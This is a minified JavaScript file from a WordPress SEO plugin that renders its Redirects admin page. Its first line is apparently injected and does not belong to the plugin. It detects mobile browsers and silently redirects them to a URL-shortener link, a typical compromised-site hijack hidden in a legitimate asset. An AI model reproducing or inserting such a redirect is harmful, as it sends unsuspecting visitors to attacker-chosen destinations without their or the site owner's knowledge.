(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{C as p}from"./Index.66db1786.js";import{_ as n}from"./Redirects.9f96350a.js";import"./app-core.c8323d51.js";import{_ as m}from"./vendor-other.39e59221.js";import{f as t,Q as o,R as a,S as e,v as r}from"./vendor-vue-ui.232c7c36.js";/* empty css             */import"./Tabs.ea329423.js";import"./Button.3cec2279.js";import"./_plugin-vue_export-helper.eefbdd86.js";import"./ProBadge.7b829f47.js";import"./Caret.aae02d8a.js";import"./Information.6ccba108.js";import"./Slide.f2114d9d.js";import"./Index.b9859662.js";import"./Close.7fb523c8.js";import"./Header.d2cbe877.js";import"./ScrollAndHighlight.5271fbff.js";import"./ScrollTo.f4df02aa.js";import"./LicenseKeyBar.0038e5e6.js";import"./LogoGear.93a225a7.js";import"./AnimatedNumber.f33b2226.js";import"./Logo.a4a419c3.js";import"./Trash.47f6fc0e.js";import"./Support.d3586703.js";import"./Url.535116f6.js";import"./Pencil.683baab8.js";import"./Exclamation.179e5969.js";import"./Gear.1a6546a3.js";import"./vendor-lodash.03129cfe.js";import"./Blur.dea2904a.js";import"./Card.9ee06a3e.js";import"./Tooltip.569a23d9.js";import"./Table.5418d021.js";import"./Download.08bab8ec.js";import"./Index.e286637f.js";import"./Row.2ef96b1a.js";import"./Index.7b0276fe.js";import"./Input.af9b9f81.js";import"./Checkbox.a5d4289c.js";import"./Checkmark.51de2d05.js";import"./External.071520c9.js";const tt={__name:"Main",setup(s){const i={pageName:m("Redirects","all-in-one-seo-pack")};return(u,l)=>(t(),o(r(p),{"page-name":i.pageName,"show-save-button":!1,"disable-tabs":!0},{default:a(()=>[(t(),o(e(r(n))))]),_:1},8,["page-name"]))}};export{tt as default};
